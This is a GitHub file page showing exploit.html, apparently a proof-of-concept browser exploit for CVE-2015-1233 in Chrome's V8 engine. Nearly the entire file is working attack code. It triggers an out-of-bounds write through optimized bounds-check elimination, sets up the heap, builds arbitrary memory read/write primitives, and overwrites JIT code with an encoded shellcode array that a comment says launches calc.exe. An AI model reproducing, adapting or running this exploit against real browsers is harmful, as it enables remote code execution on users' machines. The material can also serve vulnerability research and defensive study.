-
Notifications
You must be signed in to change notification settings - Fork 47
/
Copy pathexploit.html
245 lines (204 loc) · 7.33 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
<html>
<TITLE>
CVE-2015-1233
</TITLE>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-store, must-revalidate">
<META HTTP-EQUIV="expires" CONTENT="0">
<style>
div,h3
{
font-family: Courier
}
</style>
<body>
<div id="e_div"></div>
<script>
dontGC = this
dontGC.attr1 = {}
exploit_bce = {}
is_debug = false
fixedarray_count = 0x2000
fixedarray_size = 0x10000 - 8
fixedarray_length = fixedarray_size / 4
FIXEDARRAY_TAG = 0x11223344
TAGGED_PTR_MASK = 0xFFFFFFFE
if(is_debug) alert("[+]attach me:)")
/*********************************************************
*functions used for debugging defined here
*********************************************************/
function log(info)
{
document.getElementById("e_div").innerHTML += "<h3>"+ info +"</h3>"
}
function breakpoint()
{
if(is_debug)
{
//bp chrome_child!v8::internal::Runtime_MathAtan2 in your debugger.
Math.atan2(1)
}
}
function fail(reason)
{
log("[*]Exploit fail: " + reason)
log("[*]Aw, Snap:( You'd better have a cup of tea and exploit me again.")
setTimeout(function(){window.location.reload(true)}, 10000)
}
/*********************************************************
*functions used for V8 Heap Feng Shui defined here.
*********************************************************/
function gc(count)
{
tmp = [];
for (var i = 0; i < 0x100000; i++)
tmp.push(new Uint8Array(10));
tmp = null;
}
/************************************************************
*function used for init object exploit_bce defined here.
*************************************************************/
function init_exploit_bce()
{
exploit_bce.ARRBUFFER_LENGTH = 0x112233
exploit_bce.exploit_memptr_index = 0xBAD0BEEF
exploit_bce.gc = function()
{
tmp = [];
for (var i = 0; i < 0x100000; i++)
tmp.push(new Uint8Array(10));
tmp = null;
}
exploit_bce.corrupt = function(array, offset, oob_byte)
{
var base = -0x7FFFFFC1 + offset;
array[base - (-0x80000000)] = 0x4B;
array[base + 0x7FFFFFE1] = 0x4B;
array[base + 0x7FFFFFC1] = oob_byte;
}
exploit_bce.trigger_optimize = function ()
{
var array = new Uint8Array(0x40);
for (var i = 0; i < 1000000; i++) exploit_bce.corrupt(array, 0, 0x00);
}
exploit_bce.search_arrbuffer_memptr = function()
{
for(var i=0x40; i<0x1000; i+=4)
{
if(exploit_bce.exploit_array[i] & 1 != 0) continue
var dword = (exploit_bce.exploit_array[i + 3] << 24) + (exploit_bce.exploit_array[i + 2] << 16) + (exploit_bce.exploit_array[i + 1] << 8) + exploit_bce.exploit_array[i]
if(dword == exploit_bce.ARRBUFFER_LENGTH * 2)
{
exploit_bce.exploit_memptr_index = i + 4
break
}
}
if(exploit_bce.exploit_memptr_index == 0xBAD0BEEF)
{
fail("heap fengshui fail.")
return
}
}
exploit_bce.heap_fengshui = function()
{
exploit_bce.exploit_array = new Uint8Array(0x40);
if(is_debug)
{
exploit_bce.exploit_array[0] = 0x4B
exploit_bce.exploit_array[1] = 0x5F
exploit_bce.exploit_array[2] = 0x5F
exploit_bce.exploit_array[3] = 0x4B
}
exploit_bce.exploit_arrbuf = new ArrayBuffer(exploit_bce.ARRBUFFER_LENGTH);
exploit_bce.exploit_rw_buf = new Uint8Array(exploit_bce.exploit_arrbuf);
/*remove garbage from heap, make sure ArrayBuffer's backstore pointer can be OOB accessed*/
exploit_bce.gc()
/*write the exploit_array's length to 0x800080*/
exploit_bce.corrupt(exploit_bce.exploit_array, -2, 0x80);
/*search the ArrayBuffer backsotre buffer pointer*/
exploit_bce.search_arrbuffer_memptr()
}
exploit_bce.write_dword = function(address, offset, dword)
{
var addr_array = new Array(4)
addr_array[0] = address & 0xFF
addr_array[1] = (address >> 8) & 0xFF
addr_array[2] = (address >> 16) & 0xFF
addr_array[3] = (address >> 24) & 0xFF
for (var i = 0; i < addr_array.length; i++)
exploit_bce.exploit_array[exploit_bce.exploit_memptr_index + i] = addr_array[i];
exploit_bce.exploit_rw_buf[offset] = dword & 0xFF
exploit_bce.exploit_rw_buf[offset+1] = (dword >> 8) & 0xFF
exploit_bce.exploit_rw_buf[offset+2] = (dword >> 16) & 0xFF
exploit_bce.exploit_rw_buf[offset+3] = (dword >> 24) & 0xFF
}
exploit_bce.read_dword = function(address, offset)
{
var addr_array = new Array(4)
addr_array[0] = address & 0xFF
addr_array[1] = (address >> 8) & 0xFF
addr_array[2] = (address >> 16) & 0xFF
addr_array[3] = (address >> 24) & 0xFF
for (var i = 0; i < addr_array.length; i++)
exploit_bce.exploit_array[exploit_bce.exploit_memptr_index + i] = addr_array[i];
var byte0 = exploit_bce.exploit_rw_buf[offset]
var byte1 = exploit_bce.exploit_rw_buf[offset+1]
var byte2 = exploit_bce.exploit_rw_buf[offset+2]
var byte3 = exploit_bce.exploit_rw_buf[offset+3]
return ((byte3 << 24) + (byte2 << 16) + (byte1 << 8) + byte0)
}
}
function exploit()
{
var code = "tmp = [];";
for (var i = 0; i < 0x10000; i++)
code += "tmp[" + i + "] = " + i + ";";
var func_obj = new Function("a", code);
func_obj();
/*
spray the func_obj to a predictable address such as 0x3ff10000
*/
var fixedarrays1 = []
for(var i=0; i<fixedarray_count; i++)
{
fixedarrays1[i] = new Array(fixedarray_size / 4)
for(var j=0; j<fixedarrays1[i].length; j++)
{
if((j+1) % 2 == 0)
{
fixedarrays1[i][j] = 0x11111111
}
else
{
fixedarrays1[i][j] = func_obj
}
}
fixedarrays1[i][0] = FIXEDARRAY_TAG
}
dontGC.attr0 = fixedarrays1
exploit_bce.trigger_optimize()
exploit_bce.heap_fengshui()
var func_obj_ptr = exploit_bce.read_dword(0x3ff10000, 0) & TAGGED_PTR_MASK
var jited_code_ptr = exploit_bce.read_dword(func_obj_ptr + 0xC, 0)
/*write shellcode to jit code page with PAGE_EXECUTE_READWRITE*/
if(is_debug)
{
var shellcode = [0xCCCCCCCC, 0x9040ec83, 0x74d9dfdb, 0x2958f424, 0x37e8bec9, 0x32b1e38a, 0x31fce883, 0x98031370, 0xa4166824, 0x54d9e5a3, 0xb1509634, 0xb2078405, 0x96431834, 0x0201d3b4, 0x258d914e, 0x08e81ce7, 0xc63490f8, 0x14c8b23a, 0xd7f0146f, 0x05355562, 0x42ee078c, 0x169bb83f, 0x1d4bb9fc, 0xe1eec1bc, 0x31f07849, 0xa9baf7e1, 0xc81b5089, 0x8367835e, 0x121370eb, 0x25dc493a, 0x8ae30602, 0x2c23568f, 0x4f5f2d70, 0x32a4360d, 0x9439b3c9, 0x259a649a, 0x2969f24e, 0x2d35703b, 0x494d55ba, 0xd8825837, 0x81067f03, 0x6f1f1ed0, 0xd77f1fb6, 0xf50bba67, 0x9351bc7c, 0xdaec4c83, 0x4cef4e84, 0x03647fed, 0x60af806a, 0xc0f2ca84, 0x5166930d, 0x955d2450, 0x6554a76d, 0x601cb78a, 0x18cc7fd6, 0x8ff2ea47, 0x4e913f68, 0x4156a3fb]
}
else
{
var shellcode = [0x90909090, 0x9040ec83, 0x74d9dfdb, 0x2958f424, 0x37e8bec9, 0x32b1e38a, 0x31fce883, 0x98031370, 0xa4166824, 0x54d9e5a3, 0xb1509634, 0xb2078405, 0x96431834, 0x0201d3b4, 0x258d914e, 0x08e81ce7, 0xc63490f8, 0x14c8b23a, 0xd7f0146f, 0x05355562, 0x42ee078c, 0x169bb83f, 0x1d4bb9fc, 0xe1eec1bc, 0x31f07849, 0xa9baf7e1, 0xc81b5089, 0x8367835e, 0x121370eb, 0x25dc493a, 0x8ae30602, 0x2c23568f, 0x4f5f2d70, 0x32a4360d, 0x9439b3c9, 0x259a649a, 0x2969f24e, 0x2d35703b, 0x494d55ba, 0xd8825837, 0x81067f03, 0x6f1f1ed0, 0xd77f1fb6, 0xf50bba67, 0x9351bc7c, 0xdaec4c83, 0x4cef4e84, 0x03647fed, 0x60af806a, 0xc0f2ca84, 0x5166930d, 0x955d2450, 0x6554a76d, 0x601cb78a, 0x18cc7fd6, 0x8ff2ea47, 0x4e913f68, 0x4156a3fb]
}
for(var i=0; i<shellcode.length; i++)
{
exploit_bce.write_dword(jited_code_ptr, i*4, shellcode[i])
}
/*hello, calc.exe*/
func_obj()
return
}
init_exploit_bce()
exploit()
</script>
</body>
</html>